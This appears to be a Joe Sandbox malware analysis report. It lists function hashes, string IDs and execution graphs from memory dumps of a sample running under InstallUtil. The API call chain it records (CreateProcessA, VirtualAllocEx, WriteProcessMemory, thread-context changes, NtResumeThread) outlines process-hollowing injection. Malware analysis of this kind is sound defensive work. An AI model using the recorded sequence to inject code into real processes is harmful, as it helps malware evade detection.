                                                                                                          • Instruction Fuzzy Hash: 96F10E30B01208CFDB59EFA8D554A6EB7B3FF84304F248569D8099B369DB399C46CB94
                                                                                                          Function 05F1BA80 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2392861976
                                                                                                          • Opcode ID: 7ff5aaab25301c6d9f2f771c26506cb4d0297ce8e2bffe242d1361c8618bd1b1
                                                                                                          • Instruction ID: 4b6cd1a2356348bf347b4b76222b4279d3806c774806145a9a5889de8338b1aa
                                                                                                          • Opcode Fuzzy Hash: 7ff5aaab25301c6d9f2f771c26506cb4d0297ce8e2bffe242d1361c8618bd1b1
                                                                                                          • Instruction Fuzzy Hash: 30717D31E0020ACFCB28DF69D554A6DB7B6FF84700B10896AD806DB358DF79D946CB85
                                                                                                          Function 05F18448 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: 28decff978587290cb333680222628c3f5dd4bc48e35161d601c1b15e3d09864
                                                                                                          • Instruction ID: 8f78715c0c8752a15d9078a3f3f670a62f848b5903e5f560025eab1c6776d825
                                                                                                          • Opcode Fuzzy Hash: 28decff978587290cb333680222628c3f5dd4bc48e35161d601c1b15e3d09864
                                                                                                          • Instruction Fuzzy Hash: 52B10C30A01218CFDB14EF69D594A6EB7B3FF84354F248929D8069B359DB39DC86CB84
                                                                                                          Function 05F1AD38 Relevance: 5.2, Strings: 4, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: b540685d5966230ac0000f6ca5c157dd6f78ca1d111b3039382d36180c748891
                                                                                                          • Instruction ID: f7ecf46d11fb7ebe2a18b72a2c23cdee84d982e82056f74ff41c706c175ab90b
                                                                                                          • Opcode Fuzzy Hash: b540685d5966230ac0000f6ca5c157dd6f78ca1d111b3039382d36180c748891
                                                                                                          • Instruction Fuzzy Hash: 2151AF30E022058FCB25DB68D484AADB7B2FB85310F14852AE846DB359DB39DC46CBD8
                                                                                                          Function 05F18860 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LR^q$LR^q$$^q$$^q
                                                                                                          • API String ID: 0-2454687669
                                                                                                          • Opcode ID: be0478c8f04b9d3a93217a2e425bc6089b440b90686ea6bb583253cec3d01c0a
                                                                                                          • Instruction ID: 703f895f8ccbdfb31bdaa1a7a9e490b88d5774d2d4c4ec0ff254b6bd7ce67990
                                                                                                          • Opcode Fuzzy Hash: be0478c8f04b9d3a93217a2e425bc6089b440b90686ea6bb583253cec3d01c0a
                                                                                                          • Instruction Fuzzy Hash: 7051F431B002058FCB18DF28CA44E2AB7F6FF88710F148569E8069B3A9DB35EC45CB95

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:12.8%
                                                                                                          Dynamic/Decrypted Code Coverage:98.9%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:266
                                                                                                          Total number of Limit Nodes:10
                                                                                                          execution_graph 67503 12836c8 67504 12836e5 67503->67504 67505 12836f5 67504->67505 67507 6c79ae2 67504->67507 67508 6c79b01 67507->67508 67510 6c7d788 VirtualProtect 67508->67510 67509 6c701d1 67510->67509 67515 6c08721 67516 6c0870a 67515->67516 67517 6c5d1c1 7 API calls 67516->67517 67518 6c5d1d0 7 API calls 67516->67518 67517->67516 67518->67516 67152 6c08cc3 67153 6c0870a 67152->67153 67156 6c5d1d0 67153->67156 67160 6c5d1c1 67153->67160 67157 6c5d1e5 67156->67157 67158 6c5d1fb 67157->67158 67164 6c5d9cd 67157->67164 67158->67153 67161 6c5d1e5 67160->67161 67162 6c5d1fb 67161->67162 67163 6c5d9cd 7 API calls 67161->67163 67162->67153 67163->67162 67165 6c5d9d3 67164->67165 67170 6c5eaf8 67165->67170 67174 6c5eaa1 67165->67174 67178 6c5eae8 67165->67178 67166 6c5d675 67171 6c5eb0d 67170->67171 67183 6c5ec29 67171->67183 67175 6c5eaae 67174->67175 67177 6c5ec29 7 API calls 67175->67177 67176 6c5eb2f 67176->67166 67177->67176 67179 6c5eae0 67178->67179 67180 6c5eaf7 67178->67180 67179->67166 67182 6c5ec29 7 API calls 67180->67182 67181 6c5eb2f 67181->67166 67182->67181 67184 6c5efaa 67183->67184 67185 6c5ebb3 67183->67185 67188 6c5f300 67184->67188 67186 6c5efd5 67189 6c5f315 67188->67189 67200 6c5f337 67189->67200 67203 632138a 67189->67203 67207 6320e91 67189->67207 67211 6320fd5 67189->67211 67215 6320564 67189->67215 67220 6321193 67189->67220 67224 6320f7b 67189->67224 67228 63208bb 67189->67228 67232 6320e34 67189->67232 67237 632023b 67189->67237 67241 6320970 67189->67241 67245 6320477 67189->67245 67249 63204ca 67189->67249 67200->67186 67204 6321399 67203->67204 67254 632a5b8 67204->67254 67205 63200b5 67205->67200 67208 6320e9b 67207->67208 67258 632a348 67208->67258 67209 63200b5 67209->67200 67212 6320fe8 67211->67212 67262 6329da8 67212->67262 67213 63200b5 67213->67200 67216 632056e 67215->67216 67266 632abd0 67216->67266 67270 632ac82 67216->67270 67217 63200b5 67217->67200 67221 63211a2 67220->67221 67223 632a5b8 WriteProcessMemory 67221->67223 67222 63200b5 67222->67200 67223->67222 67225 6320eb7 67224->67225 67226 63200b5 67224->67226 67227 632a348 VirtualAllocEx 67225->67227 67226->67200 67227->67226 67229 63208c5 67228->67229 67230 63200b5 67229->67230 67231 632a348 VirtualAllocEx 67229->67231 67230->67200 67231->67230 67233 632058a 67232->67233 67234 63200b5 67232->67234 67235 632ac82 NtResumeThread 67233->67235 67236 632abd0 NtResumeThread 67233->67236 67234->67200 67235->67234 67236->67234 67239 632024a 67237->67239 67238 63200b5 67238->67200 67240 6329da8 Wow64SetThreadContext 67239->67240 67240->67238 67242 632097f 67241->67242 67244 632a5b8 WriteProcessMemory 67242->67244 67243 63200b5 67243->67200 67244->67243 67246 6320fd8 67245->67246 67247 63200b5 67245->67247 67248 6329da8 Wow64SetThreadContext 67246->67248 67247->67200 67248->67247 67250 63204e2 67249->67250 67275 6321921 67250->67275 67295 6321930 67250->67295 67251 63204fa 67255 632a600 WriteProcessMemory 67254->67255 67257 632a657 67255->67257 67257->67205 67259 632a388 VirtualAllocEx 67258->67259 67261 632a3c5 67259->67261 67261->67209 67263 6329ded Wow64SetThreadContext 67262->67263 67265 6329e35 67263->67265 67265->67213 67267 632ac18 NtResumeThread 67266->67267 67269 632ac4d 67267->67269 67269->67217 67271 632ac10 NtResumeThread 67270->67271 67272 632ac8e 67270->67272 67274 632ac4d 67271->67274 67272->67272 67274->67217 67276 6321947 67275->67276 67287 6321969 67276->67287 67315 6321991 67276->67315 67319 63220e8 67276->67319 67323 6321d0b 67276->67323 67327 63220ab 67276->67327 67331 6321c21 67276->67331 67335 6321cca 67276->67335 67339 6321e60 67276->67339 67343 63219a0 67276->67343 67347 632223c 67276->67347 67351 6321adf 67276->67351 67355 6321ddc 67276->67355 67359 63221ba 67276->67359 67363 6321f7f 67276->67363 67367 6322137 67276->67367 67371 6321a14 67276->67371 67375 6322196 67276->67375 67379 63222f7 67276->67379 67287->67251 67296 6321947 67295->67296 67297 6321991 2 API calls 67296->67297 67298 6322196 2 API calls 67296->67298 67299 63222f7 2 API calls 67296->67299 67300 6322137 2 API calls 67296->67300 67301 6321a14 2 API calls 67296->67301 67302 63221ba 2 API calls 67296->67302 67303 6321f7f 2 API calls 67296->67303 67304 6321adf 2 API calls 67296->67304 67305 6321ddc 2 API calls 67296->67305 67306 632223c 2 API calls 67296->67306 67307 6321969 67296->67307 67308 6321e60 2 API calls 67296->67308 67309 63219a0 2 API calls 67296->67309 67310 6321c21 2 API calls 67296->67310 67311 6321cca 2 API calls 67296->67311 67312 6321d0b 2 API calls 67296->67312 67313 63220ab 2 API calls 67296->67313 67314 63220e8 2 API calls 67296->67314 67297->67307 67298->67307 67299->67307 67300->67307 67301->67307 67302->67307 67303->67307 67304->67307 67305->67307 67306->67307 67307->67251 67308->67307 67309->67307 67310->67307 67311->67307 67312->67307 67313->67307 67314->67307 67316 632199a 67315->67316 67383 6327b78 67316->67383 67387 6327b6d 67316->67387 67320 63219f0 67319->67320 67321 6327b78 CreateProcessA 67320->67321 67322 6327b6d CreateProcessA 67320->67322 67321->67320 67322->67320 67324 63219f0 67323->67324 67325 6327b78 CreateProcessA 67324->67325 67326 6327b6d CreateProcessA 67324->67326 67325->67324 67326->67324 67328 63219f0 67327->67328 67329 6327b78 CreateProcessA 67328->67329 67330 6327b6d CreateProcessA 67328->67330 67329->67328 67330->67328 67332 63219f0 67331->67332 67333 6327b78 CreateProcessA 67332->67333 67334 6327b6d CreateProcessA 67332->67334 67333->67332 67334->67332 67336 63219f0 67335->67336 67337 6327b78 CreateProcessA 67336->67337 67338 6327b6d CreateProcessA 67336->67338 67337->67336 67338->67336 67340 63219f0 67339->67340 67340->67339 67341 6327b78 CreateProcessA 67340->67341 67342 6327b6d CreateProcessA 67340->67342 67341->67340 67342->67340 67344 63219d3 67343->67344 67345 6327b78 CreateProcessA 67344->67345 67346 6327b6d CreateProcessA 67344->67346 67345->67344 67346->67344 67348 63219f0 67347->67348 67349 6327b78 CreateProcessA 67348->67349 67350 6327b6d CreateProcessA 67348->67350 67349->67348 67350->67348 67352 63219f0 67351->67352 67353 6327b78 CreateProcessA 67352->67353 67354 6327b6d CreateProcessA 67352->67354 67353->67352 67354->67352 67356 63219f0 67355->67356 67357 6327b78 CreateProcessA 67356->67357 67358 6327b6d CreateProcessA 67356->67358 67357->67356 67358->67356 67360 63219f0 67359->67360 67361 6327b78 CreateProcessA 67360->67361 67362 6327b6d CreateProcessA 67360->67362 67361->67360 67362->67360 67364 63219f0 67363->67364 67365 6327b78 CreateProcessA 67364->67365 67366 6327b6d CreateProcessA 67364->67366 67365->67364 67366->67364 67368 63219f0 67367->67368 67369 6327b78 CreateProcessA 67368->67369 67370 6327b6d CreateProcessA 67368->67370 67369->67368 67370->67368 67372 63219f0 67371->67372 67373 6327b78 CreateProcessA 67372->67373 67374 6327b6d CreateProcessA 67372->67374 67373->67372 67374->67372 67376 63219f0 67375->67376 67377 6327b78 CreateProcessA 67376->67377 67378 6327b6d CreateProcessA 67376->67378 67377->67376 67378->67376 67380 63219f0 67379->67380 67381 6327b78 CreateProcessA 67380->67381 67382 6327b6d CreateProcessA 67380->67382 67381->67380 67382->67380 67384 6327bdc CreateProcessA 67383->67384 67386 6327d64 67384->67386 67388 6327bdc CreateProcessA 67387->67388 67390 6327d64 67388->67390 67391 6c7ebc0 67392 6c7ec00 VirtualAlloc 67391->67392 67394 6c7ec3a 67392->67394 67495 6327178 67496 63271c6 NtProtectVirtualMemory 67495->67496 67498 6327210 67496->67498 67399 123d030 67400 123d048 67399->67400 67401 123d0a3 67400->67401 67403 6c7e1e0 67400->67403 67404 6c7e208 67403->67404 67407 6c7e670 67404->67407 67405 6c7e22f 67408 6c7e69d 67407->67408 67411 6c7e833 67408->67411 67412 6c7d788 67408->67412 67411->67405 67413 6c7d7af 67412->67413 67416 6c7dbd8 67413->67416 67417 6c7dc20 VirtualProtect 67416->67417 67419 6c7d86c 67417->67419 67419->67405 67432 6c08afa 67433 6c08b04 67432->67433 67439 6c53080 67433->67439 67448 6c53073 67433->67448 67434 6c0870a 67435 6c5d1c1 7 API calls 67434->67435 67436 6c5d1d0 7 API calls 67434->67436 67435->67434 67436->67434 67440 6c53095 67439->67440 67457 6c530c0 67440->67457 67462 6c53152 67440->67462 67467 6c5360b 67440->67467 67472 6c53160 67440->67472 67477 6c531f2 67440->67477 67482 6c530b7 67440->67482 67449 6c53095 67448->67449 67451 6c530b7 2 API calls 67449->67451 67452 6c530c0 2 API calls 67449->67452 67453 6c53160 2 API calls 67449->67453 67454 6c531f2 2 API calls 67449->67454 67455 6c53152 2 API calls 67449->67455 67456 6c5360b 2 API calls 67449->67456 67450 6c530ab 67450->67434 67451->67450 67452->67450 67453->67450 67454->67450 67455->67450 67456->67450 67459 6c530ea 67457->67459 67458 6c5346d 67459->67458 67487 6c53da8 67459->67487 67491 6c53da1 67459->67491 67464 6c5313c 67462->67464 67463 6c5346d 67464->67463 67465 6c53da1 VirtualProtect 67464->67465 67466 6c53da8 VirtualProtect 67464->67466 67465->67464 67466->67464 67469 6c5313c 67467->67469 67468 6c5346d 67469->67467 67469->67468 67470 6c53da1 VirtualProtect 67469->67470 67471 6c53da8 VirtualProtect 67469->67471 67470->67469 67471->67469 67473 6c5313c 67472->67473 67474 6c5346d 67473->67474 67475 6c53da1 VirtualProtect 67473->67475 67476 6c53da8 VirtualProtect 67473->67476 67475->67473 67476->67473 67479 6c5313c 67477->67479 67478 6c5346d 67479->67478 67480 6c53da1 VirtualProtect 67479->67480 67481 6c53da8 VirtualProtect 67479->67481 67480->67479 67481->67479 67484 6c530ea 67482->67484 67483 6c5346d 67484->67483 67485 6c53da1 VirtualProtect 67484->67485 67486 6c53da8 VirtualProtect 67484->67486 67485->67484 67486->67484 67488 6c53df0 VirtualProtect 67487->67488 67490 6c53e2b 67488->67490 67490->67459 67492 6c53df0 VirtualProtect 67491->67492 67494 6c53e2b 67492->67494 67494->67459

                                                                                                          Executed Functions

                                                                                                          Function 06B30C50 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Deq
                                                                                                          • API String ID: 0-948982800
                                                                                                          • Opcode ID: 2170b83085cf2ed3937b98707f32445be567f9e5e257d2245e37ac4850cd9d52
                                                                                                          • Instruction ID: a6d2ef4fac4b884f8c44e5408897103b8f81753ea5bb4a7321644c482a0764fb
                                                                                                          • Opcode Fuzzy Hash: 2170b83085cf2ed3937b98707f32445be567f9e5e257d2245e37ac4850cd9d52
                                                                                                          • Instruction Fuzzy Hash: 7BD1C374E00228CFDB64DFA9D994A9DBBB2FF49300F1080A9D409AB365DB35AD85CF51
                                                                                                          Function 06B30C40 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Deq
                                                                                                          • API String ID: 0-948982800
                                                                                                          • Opcode ID: e7735a25fdb92e2fb5c61e8dc2484871e8e7f4415758f047b7d18fb3ddd7a62c
                                                                                                          • Instruction ID: c87cf2958364e8377dc8f8adeb9cf38e8317ff2a0642fae9b5570274ac9010ab
                                                                                                          • Opcode Fuzzy Hash: e7735a25fdb92e2fb5c61e8dc2484871e8e7f4415758f047b7d18fb3ddd7a62c
                                                                                                          • Instruction Fuzzy Hash: 07A19074E00228CFDB64DF69D994A9DBBF2BF89300F1085A9D409AB365DB30AD85CF51
                                                                                                          Function 06A51EF0 Relevance: .2, Instructions: 183COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 925dfa31e86bd1ca127cdd5a2fd2e8a91aa4e2f74b7722499d4bdbf71b41953b
                                                                                                          • Instruction ID: 33b19d7e66ba41838fa4deb96aeccad4010aff22d23b60ca658abca9e3adeec7
                                                                                                          • Opcode Fuzzy Hash: 925dfa31e86bd1ca127cdd5a2fd2e8a91aa4e2f74b7722499d4bdbf71b41953b
                                                                                                          • Instruction Fuzzy Hash: E8811674A01219CFDB94EFA8D554BAEB7F1BB59304F114069E80AEB385DB706E41CF90
                                                                                                          Function 06A51E24 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0051c678db4228697e8dd7987672527d47d041c5cfc1ddab1f7edeef7facf690
                                                                                                          • Instruction ID: 38dac785b28a5ef3d886aec5a0af47b61dea590dbcc41330a6625c961377a32f
                                                                                                          • Opcode Fuzzy Hash: 0051c678db4228697e8dd7987672527d47d041c5cfc1ddab1f7edeef7facf690
                                                                                                          • Instruction Fuzzy Hash: 42711874A01219CFDB94EFA8D554BAEB7F1BB59304F11406AE80AEB385DB706E41CF90
                                                                                                          Function 06A51E36 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb4afcd7d75936e8a1ff2da4deabfe9842ab4e7ac572594e23d17cd47902fac2
                                                                                                          • Instruction ID: 23a53532393b699612638abd0407464a3015d5cde576f76f04a613009fb4cc9a
                                                                                                          • Opcode Fuzzy Hash: cb4afcd7d75936e8a1ff2da4deabfe9842ab4e7ac572594e23d17cd47902fac2
                                                                                                          • Instruction Fuzzy Hash: 69711874A01219CFDB94EFA8D554BAEB7F1BB59304F11406AE80AEB385DB706E41CF90
                                                                                                          Function 06A5C6B9 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2044 6a5c6b9-6a5c6f4 2046 6a5c6f6 2044->2046 2047 6a5c6fd-6a5c710 call 6a5c348 2044->2047 2046->2047 2050 6a5c854-6a5c85b 2047->2050 2051 6a5c716-6a5c729 2047->2051 2052 6a5caf5-6a5cafc 2050->2052 2053 6a5c861-6a5c876 2050->2053 2061 6a5c737-6a5c751 2051->2061 2062 6a5c72b-6a5c732 2051->2062 2054 6a5cafe-6a5cb07 2052->2054 2055 6a5cb6b-6a5cb72 2052->2055 2066 6a5c896-6a5c89c 2053->2066 2067 6a5c878-6a5c87a 2053->2067 2054->2055 2059 6a5cb09-6a5cb1c 2054->2059 2057 6a5cc0e-6a5cc15 2055->2057 2058 6a5cb78-6a5cb81 2055->2058 2064 6a5cc17-6a5cc28 2057->2064 2065 6a5cc31-6a5cc37 2057->2065 2058->2057 2063 6a5cb87-6a5cb9a 2058->2063 2059->2055 2082 6a5cb1e-6a5cb63 2059->2082 2077 6a5c753-6a5c756 2061->2077 2078 6a5c758-6a5c765 2061->2078 2068 6a5c84d 2062->2068 2087 6a5cbad-6a5cbb1 2063->2087 2088 6a5cb9c-6a5cbab 2063->2088 2064->2065 2089 6a5cc2a 2064->2089 2072 6a5cc49-6a5cc52 2065->2072 2073 6a5cc39-6a5cc3f 2065->2073 2074 6a5c964-6a5c968 2066->2074 2075 6a5c8a2-6a5c8a4 2066->2075 2067->2066 2071 6a5c87c-6a5c893 2067->2071 2068->2050 2071->2066 2083 6a5cc55-6a5ccca 2073->2083 2084 6a5cc41-6a5cc47 2073->2084 2074->2052 2079 6a5c96e-6a5c970 2074->2079 2075->2074 2076 6a5c8aa-6a5c90b 2075->2076 2135 6a5c913-6a5c92b 2076->2135 2085 6a5c767-6a5c77b 2077->2085 2078->2085 2079->2052 2086 6a5c976-6a5c97f 2079->2086 2082->2055 2117 6a5cb65-6a5cb68 2082->2117 2150 6a5cccc-6a5ccd6 2083->2150 2151 6a5ccd8 2083->2151 2084->2072 2084->2083 2085->2068 2116 6a5c781-6a5c7d5 2085->2116 2094 6a5cad2-6a5cad8 2086->2094 2095 6a5cbd1-6a5cbd3 2087->2095 2096 6a5cbb3-6a5cbb5 2087->2096 2088->2087 2089->2065 2099 6a5caeb 2094->2099 2100 6a5cada-6a5cae9 2094->2100 2095->2057 2098 6a5cbd5-6a5cbdb 2095->2098 2096->2095 2103 6a5cbb7-6a5cbce 2096->2103 2098->2057 2105 6a5cbdd-6a5cc0b 2098->2105 2108 6a5caed-6a5caef 2099->2108 2100->2108 2103->2095 2105->2057 2108->2052 2110 6a5c984-6a5c992 2108->2110 2122 6a5c994-6a5c99a 2110->2122 2123 6a5c9aa-6a5c9c4 2110->2123 2153 6a5c7d7-6a5c7d9 2116->2153 2154 6a5c7e3-6a5c7e7 2116->2154 2117->2055 2125 6a5c99c 2122->2125 2126 6a5c99e-6a5c9a0 2122->2126 2123->2094 2131 6a5c9ca-6a5c9ce 2123->2131 2125->2123 2126->2123 2133 6a5c9d0-6a5c9d9 2131->2133 2134 6a5c9ef 2131->2134 2137 6a5c9e0-6a5c9e3 2133->2137 2138 6a5c9db-6a5c9de 2133->2138 2139 6a5c9f2-6a5ca0c 2134->2139 2145 6a5c942-6a5c961 2135->2145 2146 6a5c92d-6a5c93f 2135->2146 2141 6a5c9ed 2137->2141 2138->2141 2139->2094 2158 6a5ca12-6a5ca93 2139->2158 2141->2139 2145->2074 2146->2145 2156 6a5ccdd-6a5ccdf 2150->2156 2151->2156 2153->2154 2154->2068 2157 6a5c7e9-6a5c801 2154->2157 2159 6a5cce6-6a5cceb 2156->2159 2160 6a5cce1-6a5cce4 2156->2160 2157->2068 2164 6a5c803-6a5c80f 2157->2164 2180 6a5ca95-6a5caa7 2158->2180 2181 6a5caaa-6a5cad0 2158->2181 2162 6a5ccf1-6a5cd1e 2159->2162 2160->2162 2167 6a5c811-6a5c814 2164->2167 2168 6a5c81e-6a5c824 2164->2168 2167->2168 2169 6a5c826-6a5c829 2168->2169 2170 6a5c82c-6a5c835 2168->2170 2169->2170 2171 6a5c844-6a5c84a 2170->2171 2172 6a5c837-6a5c83a 2170->2172 2171->2068 2172->2171 2180->2181 2181->2052 2181->2094
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: 592798164b2abfdeebbbfd4d2fc6af4f95791098e4d050edb7e9f10f07f38f1f
                                                                                                          • Instruction ID: 009f39cda51c76553904bb829cc18e8f99a72074ab3a06782948ee433835bfa1
                                                                                                          • Opcode Fuzzy Hash: 592798164b2abfdeebbbfd4d2fc6af4f95791098e4d050edb7e9f10f07f38f1f
                                                                                                          • Instruction Fuzzy Hash: ED128C30E00219DFDB65EFA4D854AADBBF2FF48710F118418E812AB399DB34A945CF90
                                                                                                          Function 06A57622 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0$2
                                                                                                          • API String ID: 0-3793063076
                                                                                                          • Opcode ID: 43853cda49312cdb8d0c94f0b2ed41a71b93aeaf677f318f0b2b5d06bce76fec
                                                                                                          • Instruction ID: 901b7db06d83e2444e6226b4122ef578694fe8ab9c422de8b54a08a470d93b61
                                                                                                          • Opcode Fuzzy Hash: 43853cda49312cdb8d0c94f0b2ed41a71b93aeaf677f318f0b2b5d06bce76fec
                                                                                                          • Instruction Fuzzy Hash: 4F21CFB0D15218DFEB90EFA8D884FADBBF1BB05304F018295E809B7245C7749A89CF40
                                                                                                          Function 06B3256B Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *
                                                                                                          • API String ID: 0-163128923
                                                                                                          • Opcode ID: 308879dd4ba4287caacd5b957066bad0a6998b20d15f5673cdd5158b25436bb9
                                                                                                          • Instruction ID: 4a76bfefa75cdabbc78a31448d5ef073959c3b538a78055ebbd5d7f10ba309ca
                                                                                                          • Opcode Fuzzy Hash: 308879dd4ba4287caacd5b957066bad0a6998b20d15f5673cdd5158b25436bb9
                                                                                                          • Instruction Fuzzy Hash: 23D01C74A00228CFEB22CF20C960A8EB7B2BB04308F0000D8D80CA3300DB305F82CF01
                                                                                                          Function 06A5C6C3 Relevance: .2, Instructions: 232COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f75da1399166a6d53b27da5890c6d1189b435415f8af9c104387504f714ffdfe
                                                                                                          • Instruction ID: 48973a7012a27e39dd4d52ea9e57594e6d69bcaac794a52fe634e33be081f9b3
                                                                                                          • Opcode Fuzzy Hash: f75da1399166a6d53b27da5890c6d1189b435415f8af9c104387504f714ffdfe
                                                                                                          • Instruction Fuzzy Hash: 30A16E30E1061ADFDB65EFA5D850AEEBBF2FF58710F118418D812AB289D7389942CF50
                                                                                                          Function 06A5E6E9 Relevance: .2, Instructions: 194COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 80a4f1aca07b44bf4eb3e898ae482671750f5f93dc9767ab50618ce88a57a029
                                                                                                          • Instruction ID: 59469eeee33253e804a060cd9f216942916d9dc87c665020ce246b93951e4f9c
                                                                                                          • Opcode Fuzzy Hash: 80a4f1aca07b44bf4eb3e898ae482671750f5f93dc9767ab50618ce88a57a029
                                                                                                          • Instruction Fuzzy Hash: B2714734A00615CFC765EF69C484A5DBBF2FF89350B2684A9E8569B371DB30ED42CB90
